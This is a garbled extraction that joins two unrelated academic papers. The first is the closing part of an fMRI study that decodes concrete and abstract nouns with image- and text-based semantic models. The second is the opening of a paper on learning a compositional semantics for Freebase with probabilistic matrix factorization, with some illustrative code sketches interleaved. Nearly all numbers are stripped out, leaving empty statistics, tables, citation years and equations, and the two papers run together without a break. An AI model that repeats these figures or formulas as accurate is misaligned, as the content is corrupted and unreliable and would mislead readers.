no overall advantage for multimodal models on the more concrete nouns the third exploratory test compared the accuracy of the multimodal combination of image- and text- based models to the unimodal models when decod- ing the more concrete neural activity patterns. for the most concrete words, the highest scor- ing combination across all models was img&txen (mean±se= ± %). whilst this proved to be sig- nificantly greater than img (t = . , p <= . , df = , -tail), it was not significantly greater than txen (t = . , p = . , df = , -tail). turning to the analogous case for the italian models, img&txit (mean±se= ± %) was not significantly greater than img (t = . , p = . , df = , -tail), or txit (t = . , p = . , df = , -tail). therefore, although multimodal combinations re- turned higher accuracies than either the image- and text-based models in isolation (for concrete words), decoding accuracy was not significantly higher than either image- or text-based models. previous work decoding neural activity associated with concrete nouns has found image-based mod- els to supply complementary information to text- based models (anderson et al., ). we suggest three reasons that image-based models may have been disadvantaged in the current study compared to these past analyses. firstly, anderson et al. fo- cused on fmri data elicited by unambiguously con- crete nouns, whereas the experimental nouns anal- ysed in the current article were mostly intended to be ‘less than concrete’ (of the seven taxonomic cate- gories investigated only ‘objects/tools’ was designed to be unambiguously concrete). secondly, anderson et al. used more images to build noun representa- tions (on average images per noun compared to used here), and nouns in the imagenet images were segmented according to bounding boxes. con- sequently their input may have been less noisy than google images (which we used because of its wider coverage). finally, the experimental task of the pre- vious analyses required participants to actively think about the properties of objects, whereas the current data set was elicited as participants imagined situ- ations associated with nouns (and hence may have invoked neural representations with more contextual elements). the lack of a significant increase in decoding ac- curacy achieved by pairing image- and text-based models allows us to infer that the text-based model contained many aspects of the visual semantic struc- ture found in the image-based model. of course we expect modal structure in text-based models com- mensurate with what people are inclined to report in writing; e.g., it is easy to convey in text that both bananas and lemons are yellow and curvy, and light- bulbs and pears have similar shapes. therefore we would anticipate correspondences in semantic sim- ilarities between image and text-based models and for these correspondences to extend to match neural similarities, e.g., as induced by participants viewing pictures of objects (carlson et al., ). . group-level decoding analysis the similarity-based decoding approach we have ap- plied enables group-level neural representations to be built simply by taking the mean similarity matrix over participants. values in the correlation matrix were r to z (arctanh) transformed prior to averaging, then the average values were back transformed to the original range using tanh. 
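the group-level averaging just described (arctanh transform, mean across participants, tanh back-transform) is compact enough to sketch directly; the array shapes and the toy data are assumptions for illustration.

# sketch of building a group-level similarity matrix from per-participant matrices:
# arctanh-transform, average across participants, then map back with tanh.
import numpy as np

def group_similarity(sim_matrices):
    """sim_matrices: array of shape (n_participants, n_words, n_words) of pearson r values."""
    z = np.arctanh(np.clip(sim_matrices, -0.999999, 0.999999))  # guard against r == ±1 on the diagonal
    return np.tanh(z.mean(axis=0))

# toy usage: nine participants, 67 words
rng = np.random.default_rng(0)
sims = np.tanh(rng.normal(scale=0.3, size=(9, 67, 67)))
print(group_similarity(sims).shape)   # (67, 67)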
the z-transformation before averaging was used because averaging z-transformed values (and back transforming) tends to yield less biased estimates of the population value than averaging the raw coefficients (silver and dunlap, ). however, in the current analysis results obtained with z-transformation versus without it were virtually identical. building group-level representations by averaging correlation matrices side-steps potential problems surrounding the obvious alternative method of averaging data in fmri space, where anatomical/functional differences between different peoples' brains may result in relatively similar activity patterns being spatially mismatched in the standardised fmri space. the motivation behind building group-level neural representations is that we might expect these to better match the computational semantic models than individual-level data. this is because the models are also built at group level, created from the photographs and text of many individuals. however, building group-level neural representations will only be beneficial if there exist group-level commonalities in representational similarity (when combining data will reduce noise) as opposed to individual semantic representational schemes. accuracies achieved using models to decode the group-level neural similarity matrices are displayed in the final column of the bar charts at the right of figure . specifically, decoding accuracies were: for all words combined: img= . %, txit&txen= . % and img&txit&txen= . %. for the most concrete words: img= . %, txit&txen= . % and img&txit&txen= . %. for the most abstract words: img= . %, txit&txen= . % and img&txit&txen= . %. to statistically test whether group-level decoding accuracies surpassed those of the individual-level results, we compared the set of individual-level mean accuracies to the corresponding group-level mean accuracy using one-sample t-tests. in all tests (see table ) the individual-level accuracies were significantly different from (lower than) the group-level accuracy (corrected for multiple comparisons using the false discovery rate (benjamini and hochberg, )). this is indicative of group-level regularities in semantic similarity for both concrete and abstract nouns and also their combination.

table : results of one sample t-tests comparing the set of individual-level mean decoding accuracies to the group-level accuracy (see section . ). all tests were -tailed with df= . the first number in each cell is the t-statistic, the second number in round brackets is the p-value (corrected according to false discovery rate).
                 all words combined    most concrete    most abstract
img              - . (. )              - . (. )         - . (. )
txit&txen        - . (. )              - . (. )         - . (. )
img&txit&txen    - . (. )              - . (. )         - . (. )

a qualitative observation is that the differences between group- and individual-level accuracy appear to be greater for concrete nouns. this could be consistent with participants having a more subjective semantic representation of abstract nouns; however we did not attempt to statistically test this claim. this is because a meaningful comparison would require concrete and abstract words to be controlled by being at least equally discriminable at individual level, and this does not appear to be the case with this dataset. conclusion this article has demonstrated that neural activity patterns elicited in mental situations of abstract nouns can be decoded using text-based computational semantic models, thus demonstrating that computational semantic models can make a contribution to interpreting the semantic structure of neural activity patterns associated with abstract nouns. furthermore, by comparing how well visually grounded and textual semantic models
decode brain activity associated with concrete or abstract nouns, we have observed a selective advantage for textual over visual models in decoding the more abstract nouns. this has therefore provided initial model-based brain decoding evidence that is broadly in line with the predictions of dual coding theory (paivio, ). however, results should be interpreted in light of the following two factors. first, the dataset analysed was for a small sample of words, and it is reasonable to conjecture that some of these words are also encoded in modalities other than vision and language. for example, musical words may be encoded in acoustic and motor features (see also fernandino et al. ( )). future work will be necessary to verify that the findings generalise more broadly to words from domains beyond law and music. in work in progress the authors are undertaking more focused analyses on the current dataset, using textual, visual and newly developed audio semantic models (kiela and clark, ) to tease apart linguistic, visual and acoustic contributions to semantic representation and how these vary throughout different regions of the brain. a second limitation of the current approach, as pointed out by a reviewer, is that the google image search algorithm (the workings of which are unknown to the authors) may not perform as well for abstract words as it does for concrete words. consequently, the visual model may have been handicapped compared to the textual model when decoding neural representations associated with more abstract words. we have no current measure of the degree of this effect, but it may be possible to alleviate it in future work by having participants manually select images that they associate with abstract stimulus words, and using computational representations derived from these images in the analysis. secondary results are that we have exploited representational similarity space to build group-level neural representations which better match our inherently group-level computational semantic models. in so doing, this exposes group-level commonalities in neural representation for both concrete and abstract words. such group-level representations may prove both a useful test-bed for evaluating computational semantic models and a potentially useful information source to incorporate into computational models (see fyshe et al. ( ) for related work). finally, we have demonstrated that english and italian text-based models are roughly interchangeable in our neural decoding task. that the english text-based model tended to return marginally higher results on our italian brain data than the italian model provides a cautionary note for future studies wishing to use semantic models from different languages to identify culturally specific aspects of neural semantic representation, e.g., as a follow-up to zinszer et al. ( ). however, we also note that the english wikipedia data was larger than the corresponding italian corpus. acknowledgments we thank three anonymous reviewers for their insightful comments and suggestions, brian murphy for his involvement in the configuration, collection and preprocessing of the original dataset, and marco baroni and elia bruni for early conversations on some of the ideas presented.
stephen clark is sup- ported by erc starting grant discotex ( ). references a. j. anderson, e. bruni, u. bordignon, m. poesio, and m. baroni. . of words, eyes and brains: correlat- ing image-based distributional semantic models with neural representations of concepts. in proceedings of emnlp, pages – , seattle, wa. a. j. anderson, b. murphy, and m. poesio. . discriminating taxonomic categories and domains in mental simulations of concepts of varying concrete- ness. j. cognitive neuroscience, ( ): – . a. j. anderson, e. bruni, a. lopopolo, m. poesio, and m. baroni. . reading visually embodied mean- ing from the brain: visually grounded computational models decode visual-object mental imagery induced by written text. neuroimage, : – . a. j. anderson, b. d zinszer, and r. d. s. raizada. . representational similarity encoding for fmri: pattern-based synthesis to predict brain activity using stimulus-model-similarities. neuroimage, : – . m. andrews, g. vigliocco, and d. vinson. . in- tegrating experiential and distributional data to learn semantic representations. psychological review, ( ): – . l. barca, c. burani, and l. s. arduino. . word naming times and psycholinguistic norms for italian nouns. behavior research methods, instruments, & computers, : – . y. benjamini and y. hochberg. . controlling the false discovery rate: a practical and powerful ap- proach to multiple testing. journal of the royal sta- tistical society, series b (methodological), ( ): – . l. bentivogli, p. forner, b. magnini, and e. pianta. . revising the wordnet domains hierarchy: seman- tics, coverage, and balancing. in proceedings of the workshop on multilingual linguistic resources, pages – , geneva, switzerland. s. bergsma and b. van durme. . learning bilingual lexicons using the visual similarity of labeled web im- ages. in ijcai, pages – . r. bruffaerts, p. dupont, r. peeters, s. de deyne, g. storms, and r. vandenberghe. . similar- ity of fmri activity patterns in left perirhinal cortex reflects similarity between words. j. neuroscience, ( ): – . e. bruni, n. k. tran, and m. baroni. . multimodal distributional semantics. journal of artifical intelli- gence research, : – . m. brysbaert, a. b. warriner, and v. kuperman. . concreteness ratings for thousand generally known english word lemmas. behavior research methods, ( ): – . t. a. carlson, r.a. simmons, and n. kriegeskorte. . the emergence of semantic meaning in the ventral temporal pathway. j. cognitive neuroscience, ( ): – . k. m. chang, t. m. mitchell, and m. a. just. . quantitative modeling of the neural representations of objects: how semantic feature norms can account for fmri activation. neuroimage: special issue on mul- tivariate decoding and brain reading, : – . k. darwish. . named entity recognition using cross-lingual resources: arabic as an example. in proc. acl, pages – . b. devereux, c. kelly, and a. korhonen. . us- ing fmri activation to conceptual stimuli to evalu- ate methods for extracting conceptual representations from corpora. in proceedings of the naacl hlt first workshop on computational neurolinguistics, pages – , los angeles, usa. c. fellbaum, editor. . wordnet: an electronic database. mit press, cambridge, ma. r. fergus, l. fei-fei, p. perona, and a. zisserman. . learning object categories from google’s im- age search. in iccv, pages – . l. fernandino, c. j. humphries, m. s. seidenberg, w. l. gross, l. l. conant, and j. r. binder. . 
prediction of brain activation patterns as- sociated with individual lexical concepts based on five sensory-motor attributes. neuropsycholigia. doi: . /j.neuropsychologia. . . . a. fyshe, p. p. talukdar, b. murphy, and t. m. mitchell. . interpretable semantic vectors from a joint model of brain-and text-based meaning. in proceed- ings of acl, pages – , baltimore, md. y. jia, e. shelhamer, j. donahue, s. karayev, j. long, r. b. girshick, s. guadarrama, and t. darrell. . caffe: convolutional architecture for fast feature em- bedding. in acm multimedia, pages – . d. kiela and l. bottou. . learning image em- beddings using convolutional neural networks for im- proved multi-modal semantics. in proceedings of emnlp, pages – , doha, qatar. d. kiela and s. clark. . multi- and cross-modal semantics beyond vision: grounding in auditory per- ception. in proceedings of the empirical methods in natural language processing conference (emnlp ), pages – , lisbon, portugal. d. kiela, f. hill, a. korhonen, and s. clark. . im- proving multi-modal representations using image dis- persion: why less is sometimes more. in proceedings of acl . n. kriegeskorte, w. k. simmons, p. s. f. bellgowan, and c. i. baker. . circular analysis in systems neuro- science: the dangers of double dipping. nature neu- roscience, : – . n. kriegeskorte. . deep neural networks: a new framework for modeling biological vision and brain information processing. annual review of vision sci- ence, : – . t. mikolov, k. chen, g. corrado, and j. dean. . efficient estimation of word representations in vector space. in proceedings of iclr, scottsdale, arizona, usa. t. m. mitchell, s. v. shinkareva, a. carlson, k.-m. chang, v. l. malave, r. a. mason, and m. a. just. . predicting human brain activity associated with the meaning of nouns. science, : – . b. murphy, p. talukdar, and t. mitchell. . selecting corpus-semantic models for neurolinguistic decoding. in proceedings of the first joint conference on lexi- cal and computational semantics (*sem), pages – , montreal, canada. a paivio, editor. . imagery and verbal processes. holt, rinehart, and winston, new york. m. palatucci, d. pomerleau, g. hinton, and t. mitchell. . zero-shot learning with semantic output codes. neural information processing systems, : – . f. pereira, m. botvinick, and g. detre. . using wikipedia to learn semantic feature representations of concrete concepts in neuroimaging experiments. artif. intell., : – . a. s. razavian, h. azizpour, j. sullivan, and s. carls- son. . cnn features off-the-shelf: an astound- ing baseline for recognition. in ieee conference on computer vision and pattern recognition workshops , pages – . a. e. richman and p. schone. . mining wiki re- sources for multilingual named entity recognition. in proc. acl. l. shi, r. mihalcea, and m. tian. . cross- language text classification by model translation and semi-supervised learning. in proc. emnlp. n. c. silver and w. p. dunlap. . averaging correla- tion coefficients: should fisher’s z transformation be used? j. applied psychology, ( ): – . j. sivic and a. zisserman. . video google: a text retrieval approach to object matching in videos. in iccv, pages – . g. sudre, d. pomerleau, m. palatucci, l. wehbe, a. fyshe, r. salmelin, and t. mitchell. . track- ing neural coding of perceptual and semantic features of concrete nouns. neuroimage, : – . k. wiemer-hastings and x. xu. . content differ- ences for abstract and concrete concepts. cognitive science, : – . b. d. zinszer, a. j. anderson, o. kang, t. 
wheatley, and r. d. s. raizada. . semantic structural align- ment of neural representational spaces enables transla- tion between english and chinese words. j. cognitive neuroscience, ( ): – . learning a compositional semantics for freebase with an open predicate vocabulary jayant krishnamurthy carnegie mellon university forbes avenue pittsburgh, pa jayantk@cs.cmu.edu tom m. mitchell carnegie mellon university forbes avenue pittsburgh, pa tom.mitchell@cmu.edu abstract we present an approach to learning a model- theoretic semantics for natural language tied to freebase. crucially, our approach uses an open predicate vocabulary, enabling it to produce denotations for phrases such as “re- publican front-runner from texas” whose se- mantics cannot be represented using the free- base schema. our approach directly converts a sentence’s syntactic ccg parse into a log- ical form containing predicates derived from the words in the sentence, assigning each word a consistent semantics across sentences. this logical form is evaluated against a learned probabilistic database that defines a distribu- tion over denotations for each textual pred- icate. a training phase produces this prob- abilistic database using a corpus of entity- linked text and probabilistic matrix factoriza- tion with a novel ranking objective function. we evaluate our approach on a compositional question answering task where it outperforms several competitive baselines. we also com- pare our approach against manually annotated freebase queries, finding that our open pred- icate vocabulary enables us to answer many questions that freebase cannot. introduction traditional knowledge representation assumes that world knowledge can be encoded using a closed vocabulary of formal predicates. in recent years, semantic parsing has enabled us to build compo- sitional models of natural language semantics us- ing such a closed predicate vocabulary (zelle and mooney, ; zettlemoyer and collins, ). these semantic parsers map natural language state- ments to database queries, enabling applications such as answering questions using a large knowl- edge base (yahya et al., ; krishnamurthy and mitchell, ; cai and yates, ; kwiatkowski et al., ; berant et al., ; berant and liang, ; reddy et al., ). furthermore, the model- theoretic semantics provided by such parsers have the potential to improve performance on other tasks, such as information extraction and coreference res- olution. however, a closed predicate vocabulary has inher- ent limitations. first, its coverage will be limited, as such vocabularies are typically manually con- structed. second, it may abstract away potentially relevant semantic differences. for example, the se- mantics of “republican front-runner” cannot be ad- equately encoded in the freebase schema because it lacks the concept of a “front-runner.” we could choose to encode this concept as “politician” at the cost of abstracting away the distinction between the two. as this example illustrates, these two problems are prevalent in even the largest knowledge bases. an alternative paradigm is an open predicate vocabulary, where each natural language word or phrase is given its own formal predicate. this paradigm is embodied in both open information ex- traction (banko et al., ) and universal schema (riedel et al., ). open predicate vocabularies have the potential to capture subtle semantic distinc- tions and achieve high coverage. 
however, we have yet to develop compelling approaches to composi- tional semantics within this paradigm. this paper takes a step toward compositional se- transactions of the association for computational linguistics, vol. , pp. – , . action editor: katrin erk. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. input text republican front-runner from texas → logical form λx.∃y,z.front-runner(x)∧y = /en/republican∧nn(y,x)∧z = /en/texas ∧ from(x,z) → entity prob. /en/george bush . /en/rick perry . ... φ θ texas repub. g. bush ... f. -r u n . p o l . s t a t e .. . entity/predicate embeddings φ θ (g. bush, texas) (g. bush, repub.) (repub., g. bush) ... f r o m l iv e s in n n .. . → texas repub. g. bush ... f. -r u n . p o l . s t a t e .. . . . . . . . . . . probabilistic database (g. bush, texas) (g. bush, repub.) (repub., g. bush) ... f r o m l iv e s in n n .. . . . . . . . . . . figure : overview of our approach. top left: the text is converted to logical form by ccg syntactic parsing and a collection of manually-defined rules. bottom: low-dimensional embeddings of each entity (entity pair) and category (relation) are learned from an entity-linked web corpus. these embeddings are used to construct a probabilistic database. the labels of these matrices are shortened for space reasons. top right: evaluating the logical form on the probabilistic database computes the marginal probability that each entity is an element of the text’s denotation. mantics with an open predicate vocabulary. our ap- proach defines a distribution over denotations (sets of freebase entities) given an input text. the model has two components, shown in figure . the first component is a rule-based semantic parser that uses a syntactic ccg parser and manually-defined rules to map entity-linked texts to logical forms contain- ing predicates derived from the words in the text. the second component is a probabilistic database with a possible worlds semantics that defines a dis- tribution over denotations for each textually-derived predicate. this database assigns independent prob- abilities to individual predicate instances, such as p(front-runner(/en/george bush)) = . . together, these components define an exponentially- large distribution over denotations for an input text; to simplify this output, we compute the marginal probability, over all possible worlds, that each entity is an element of the text’s denotation. the learning problem in our approach is to train the probabilistic database to predict a denotation for each predicate. we pose this problem as probabilis- tic matrix factorization with a novel query/answer ranking objective. this factorization learns a low- dimensional embedding of each entity (entity pair) and category (relation) such that the denotation of a predicate is likely to contain entities or entity pairs with nearby vectors. to train the database, we first collect training data by analyzing entity-linked sen- tences in a large web corpus with the rule-based semantic parser. this process generates a collec- tion of logical form queries with observed entity an- swers. the query/answer ranking objective, when optimized, trains the database to rank the observed answers for each query above unobserved answers. 
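to make the pipeline just described concrete, the following sketch shows how a ranked entity list could be derived once the probabilistic database is in place: under the independence assumption, the probability that an entity belongs to the denotation of a conjunctive logical form is the product of the probabilities of its predicate instances. this is an illustrative sketch only; the entity ids, predicate names and probabilities are invented rather than taken from the paper.

```python
# illustrative sketch (not the authors' code): scoring candidate entities for a
# conjunctive logical form such as
#   λx.∃y,z. front-runner(x) ∧ nn(y,x) ∧ y=/en/republican ∧ from(x,z) ∧ z=/en/texas
# under a probabilistic database that assigns an independent probability to each
# predicate instance. all probabilities and entity ids below are made up.

category_prob = {
    ("front-runner", "/en/george_bush"): 0.70,
    ("front-runner", "/en/rick_perry"): 0.55,
}
relation_prob = {
    ("nn", ("/en/republican", "/en/george_bush")): 0.90,
    ("from", ("/en/george_bush", "/en/texas")): 0.95,
    ("nn", ("/en/republican", "/en/rick_perry")): 0.85,
    ("from", ("/en/rick_perry", "/en/texas")): 0.90,
}

def marginal_membership(entity, categories, relations):
    """p(entity is in the denotation): product of the independent instance probabilities."""
    p = 1.0
    for c in categories:                      # unary conjuncts, e.g. front-runner(x)
        p *= category_prob.get((c, entity), 0.0)
    for rel, make_args in relations:          # binary conjuncts with one fixed argument
        p *= relation_prob.get((rel, make_args(entity)), 0.0)
    return p

query_categories = ["front-runner"]
query_relations = [("nn", lambda e: ("/en/republican", e)),
                   ("from", lambda e: (e, "/en/texas"))]

for e in ["/en/george_bush", "/en/rick_perry"]:
    print(e, marginal_membership(e, query_categories, query_relations))
```

how the per-instance probabilities themselves are obtained is the subject of the matrix factorization and training sections that follow.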
we evaluate our approach on a question answer- ing task, finding that our approach outperforms sev- eral baselines and that our new training objective improves performance over a previously-proposed objective. we also evaluate the trade-offs between open and closed predicate vocabularies by compar- ing our approach to a manually-annotated freebase query for each question. this comparison reveals that, when freebase contains predicates that cover the question, it achieves higher precision and recall than our approach. however, our approach can cor- rectly answer many questions not covered by free- base. system overview the purpose of our system is to predict a denota- tion γ for a given natural language text s. the de- notation γ is the set of freebase entities that s refers to; for example, if s = “president of the us,” then γ = {/en/obama, /en/bush, ...}. our system this paper uses a simple model-theoretic semantics where the denotation of a noun phrase is a set of entities and the de- notation of a sentence is either true or false. however, for no- tational convenience, denotations γ will be treated as sets of entities throughout. represents this prediction problem using the follow- ing probabilistic model: p(γ|s) = ∑ w ∑ ` p(γ|`,w)p(w)p(`|s) the first term in this factorization, p(`|s), is a dis- tribution over logical forms ` given the text s. this term corresponds to the rule-based semantic parser (section ). this semantic parser is deterministic, so this term assigns probability to a single logical form for each text. the second term, p(w), repre- sents a distribution over possible worlds, where each world is an assignment of truth values to all possible predicate instances. the distribution over worlds is represented by a probabilistic database (section ). the final term, p(γ|`,w), deterministically evalu- ates the logical form ` on the world w to produce a denotation γ. this term represents query evaluation against a fixed database, as in other work on seman- tic parsing. section describes inference in our model. to produce a ranked list of entities (figure , top right) from p(γ|s), our system computes the marginal probability that each entity is an element of the de- notation γ. this problem corresponds to query eval- uation in a probabilistic database, which is known to be tractable in many cases (suciu et al., ). section describes training, which estimates pa- rameters for the probabilistic database p(w). this step first automatically generates training data using the rule-based semantic parser. this data is used to formulate a matrix factorization problem that is op- timized to estimate the database parameters. rule-based semantic parser the first part of our compositional semantics system is a rule-based system that deterministically com- putes a logical form ` for a text s. this component is used during inference to analyze the logical struc- ture of text, and during training to generate training data (see section . ). several input/output pairs for this system are shown in figure . the conversion to logical form has phases: . ccg syntactic parsing parses the text and ap- plies several deterministic syntactic transfor- mations to facilitate semantic analysis. . entity linking marks known freebase entities in the text. . semantic analysis assigns a logical form to each word, then composes them to produce a logical form for the complete text. . syntactic parsing the first step in our analysis is to syntactically parse the text. 
we use the asp-syn parser (kr- ishnamurthy and mitchell, ) trained on ccg- bank (hockenmaier and steedman, ). we then automatically transform the resulting syntactic parse to make the syntactic structure more amenable to semantic analysis. this step marks nps in conjunctions by replacing their syntactic category with np[conj]. this transformation allows seman- tic analysis to distinguish between appositives and comma-separated lists. it also transforms all verb ar- guments to core arguments, i.e., using the category pp/np as opposed to ((s\np)\(s\np))/np. this step simplifies the semantic analysis of verbs with prepositional phrase arguments. the final transformation adds a word feature to each pp cat- egory, e.g., mapping pp to pp[by]. these features are used to generate verb-preposition relation predi- cates, such as directed by. . entity linking the second step is to identify mentions of freebase entities in the text. this step could be performed by an off-the-shelf entity linking system (ratinov et al., ; milne and witten, ) or string matching. however, our training and test data is derived from clueweb , so we rely on the entity linking for this corpus provided by gabrilovich et. al ( ). our system incorporates the provided entity links into the syntactic parse provided that they are con- sistent with the parse structure. specifically, we re- quire that each mention is either ( ) a constituent in the parse tree with syntactic category n or np or ( ) a collection of n/n or np/np modifiers with a single head word. the first case covers noun and noun phrase mentions, while the second case cov- ers noun compounds. in both cases, we substitute a single multi-word terminal into the parse tree span- ning the mention and invoke special semantic rules for mentions described in the next section. dan hesse, ceo of sprint λx.∃y.x = /en/dan hesse ∧ ceo(x)∧ of(x,y)∧y = /en/sprint yankees pitcher λx.∃y.pitcher(x)∧ nn(y,x)∧y = /en/yankees tom cruise plays maverick in the movie top gun. ∃x,y,z.x = /en/tom cruise ∧ plays(x,y) ∧ y = /en/maverick (character) ∧ plays in(x,z)∧z = /en/top gun figure : example input/output pairs for our seman- tic analysis system. mentions of freebase entities in the text are indicated by underlines. . semantic analysis the final step uses the syntactic parse and entity links to produce a logical form for the text. the sys- tem induces a logical form for every word in the text based on its syntactic ccg category. composing these logical forms according to the syntactic parse produces a logical form for the entire text. our semantic analyses are based on a relatively naı̈ve model-theoretic semantics. we focus on lan- guage whose semantics can be represented with existentially-quantified conjunctions of unary and binary predicates, ignoring, for example, tempo- ral scope and superlatives. generally, our sys- tem models nouns and adjectives as unary predi- cates, and verbs and prepositions as binary predi- cates. special multi-word predicates are generated for verb-preposition combinations. entity mentions are mapped to the mentioned entity in the logical form. we also created special rules for analyzing conjunctions, appositives, and relativizing conjunc- tions. the complete list of rules used to produce these logical forms is available online. we made several notable choices in designing this component. first, multi-argument verbs are ana- lyzed using pairwise relations, as in the third exam- ple in figure . 
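as a rough illustration of this pairwise treatment, the sketch below decomposes a verb with a direct object and a prepositional-phrase argument into binary predicates, mirroring the example above; the helper function and frame representation are hypothetical and not part of the system described here.

```python
# hypothetical sketch of the pairwise analysis of multi-argument verbs: rather
# than a single ternary predicate plays(x, y, z), the verb contributes one
# binary predicate per argument slot (the object, and one per pp argument).

def verb_to_pairwise(verb, subject, obj=None, pp_args=()):
    """return binary predicate instances for a verb and its arguments."""
    conjuncts = []
    if obj is not None:
        conjuncts.append((verb, subject, obj))                        # e.g. plays(x, y)
    for preposition, argument in pp_args:
        conjuncts.append((verb + " " + preposition, subject, argument))  # e.g. "plays in"(x, z)
    return conjuncts

print(verb_to_pairwise("plays", "/en/tom_cruise",
                       obj="/en/maverick_(character)",
                       pp_args=[("in", "/en/top_gun")]))
```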
this analysis allows us to avoid rea- soning about entity triples (quadruples, etc.), which are challenging for the matrix factorization due to sparsity. second, noun-preposition combinations are analyzed as a category and relation, as in the first example in figure . we empirically found that combining the noun and preposition in such http://rtw.ml.cmu.edu/tacl _csf instances resulted in worse performance, as it dra- matically increased the sparsity of training instances for the combined relations. third, entity mentions with the n/n category are analyzed using a spe- cial noun-noun relation, as in the second example in figure . our intuition is that this relation shares instances with other relations (e.g., “city in texas” implies “texan city”). finally, we lowercased each word to create its predicate name, but performed no lemmatization or other normalization. . discussion the scope of our semantic analysis system is some- what limited relative to other similar systems (bos, ; lewis and steedman, ) as it only out- puts existentially-quantified conjunctions of predi- cates. our goal in building this system was to an- alyze noun phrases and simple sentences, for which this representation generally suffices. the reason for this focus is twofold. first, this subset of language is sufficient to capture much of the language surround- ing freebase entities. second, for various techni- cal reasons, this restricted semantic representation is easier to use (and more informative) for training the probabilistic database (see section . ). note that this system can be straightforwardly ex- tended to model additional linguistic phenomena, such as additional logical operators and generalized quantifiers, by writing additional rules. the seman- tics of logical forms including these operations are well-defined in our model, and the system does not even need to be re-trained to incorporate these addi- tions. probabilistic database the second part of our compositional semantics sys- tem is a probabilistic database. this database rep- resents a distribution over possible worlds, where each world is an assignment of truth values to ev- ery predicate instance. equivalently, the probabilis- tic database can be viewed as a distribution over databases or knowledge bases. formally, a probabilistic database is a collection of random variables, each of which represents the truth value of a single predicate instance. given en- tities e ∈ e, categories c ∈ c, and relations r ∈ r the probabilistic database contains boolean random variables c(e) and r(e ,e ) for each category and relation instance, respectively. all of these ran- dom variables are assumed to be independent. let a world w represent an assignment of truth values to all of these random variables, where c(e) = wc,e and r(e ,e ) = wr,e ,e . by independence, the probabil- ity of a world can be written as: p(w) = ∏ e∈e ∏ c∈c p(c(e) = wc,e)× ∏ e ∈e ∏ e ∈e ∏ r∈r p(r(e ,e ) = wr,e ,e ) the next section discusses how probabilistic ma- trix factorization is used to model the probabilities of these predicate instances. . matrix factorization model the probabilistic matrix factorization model treats the truth of each predicate instance as an indepen- dent boolean random variable that is true with prob- ability: p(c(e) = true) = σ(θtc φe) p(r(e ,e ) = true) = σ(θ t r φ(e ,e )) above, σ(x) = e x +ex is the logistic function. 
in these equations, θc and θr represent k-dimensional vectors of per-predicate parameters, while φe and φ(e ,e ) represent k-dimensional vector embeddings of each entity and entity pair. this model contains a low-dimensional embedding of each predicate and entity such that each predicate’s denotation has a high probability of containing entities with nearby vectors. the probability that each variable is false is simply minus the probability that it is true. this model can be viewed as matrix factorization, as depicted in figure . the category and relation instance probabilities can be arranged in a pair of matrices of dimension |e| × |c| and |e| × |r|. each row of these matrices represents an entity or entity pair, each column represents a category or re- lation, and each value is between and and rep- resents a truth probability (figure , bottom right). these two matrices are factored into matrices of size |e|×k and k ×|c|, and |e| ×k and k ×|r|, re- spectively, containing k-dimensional embeddings of each entity, category, entity pair and relation (figure , bottom left). these low-dimensional embeddings are represented by the parameters φ and θ. inference: computing marginal probabilities inference computes the marginal probability, over all possible worlds, that each entity is an element of a text’s denotation. in many cases – depending on the text – these marginal probabilities can be com- puted exactly in polynomial time. the inference problem is to calculate p(e ∈ γ|s) for each entity e. because both the semantic parser p(`|s) and query evaluation p(γ|`,w) are deter- ministic, this problem can be rewritten as: p(e ∈ γ|s) = ∑ γ (e ∈ γ)p(γ|s) = ∑ w (e ∈ j`kw)p(w) above, ` represents the logical form for the text s produced by the rule-based semantic parser, and represents the indicator function. the notation j`kw represents denotation produced by (determin- istically) evaluating the logical form ` on world w. this inference problem corresponds to query eval- uation in a probabilistic database, which is #p-hard in general. intuitively, this problem can be difficult because p(γ|s) is a joint distribution over sets of en- tities that can be exponentially large in the number of entities. however, a large subset of probabilistic database queries, known as safe queries, permit polynomial time evaluation (dalvi and suciu, ). safe queries can be evaluated extensionally using a prob- abilistic notion of a denotation that treats each entity as independent. let j`kp denote a probabilistic de- notation, which is a function from entities (or entity pairs) to probabilities, i.e., j`kp (e) ∈ [ , ]. the denotation of a logical form is then computed re- cursively, in the same manner as a non-probabilistic denotation, using probabilistic extensions of the typ- ical rules, such as: jckp (e) = ∑ w p(w) (wc,e) jrkp (e ,e ) = ∑ w p(w) (wr,e ,e ) jc (x)∧ c (x)kp (e) = jc kp (e)× jc kp (e) j∃y.r(x,y)kp (e) = − ∏ y∈e ( − jrkp (e,y)) the first two rules are base cases that simply re- trieve predicate probabilities from the probabilistic database. the remaining rules compute the prob- abilistic denotation of a logical form from the de- notations of its parts. the formula for the prob- abilistic computation on the right of each of these rules is a straightforward consequence of the (as- sumed) independence of entities. for example, the last rule computes the probability of an or of a set of independent random variables (indexed by y) us- ing the identity a ∨ b = ¬(¬a ∧¬b). 
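the following sketch puts these pieces together: per-instance probabilities come from the factorization model, the conjunction rule multiplies them, and the existential rule is a noisy-or over candidate arguments. the embeddings are random placeholders and the predicate and entity names are invented; only the combination rules are intended to be faithful to the description above.

```python
import numpy as np

# sketch of the extensional evaluation rules above, with instance probabilities
# produced by the factorization model. embeddings here are random placeholders
# and the predicates/entities are invented; only the combination rules matter.

rng = np.random.default_rng(0)
k = 4
entities = ["e_a", "e_b", "e_c"]
theta = {"president": rng.normal(size=k), "of": rng.normal(size=k)}
phi_entity = {e: rng.normal(size=k) for e in entities}
phi_pair = {(a, b): rng.normal(size=k) for a in entities for b in entities}

def sigma(x):
    return 1.0 / (1.0 + np.exp(-x))

def p_category(c, e):                 # base case for unary predicates
    return sigma(theta[c] @ phi_entity[e])

def p_relation(r, e1, e2):            # base case for binary predicates
    return sigma(theta[r] @ phi_pair[(e1, e2)])

def p_conjunction(e, cats, rels):
    """conjunction rule: probabilities of independent conjuncts multiply."""
    p = 1.0
    for c in cats:
        p *= p_category(c, e)
    for r, other in rels:
        p *= p_relation(r, e, other)
    return p

def p_exists(e, r):
    """existential rule: 1 - prod_y (1 - p(r(e, y))), i.e. a noisy-or over y."""
    q = 1.0
    for y in entities:
        q *= 1.0 - p_relation(r, e, y)
    return 1.0 - q

# λx. president(x) ∧ of(x, e_b)   and   λx. ∃y. of(x, y)
for e in entities:
    print(e, round(p_conjunction(e, ["president"], [("of", "e_b")]), 3),
          round(p_exists(e, "of"), 3))
```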
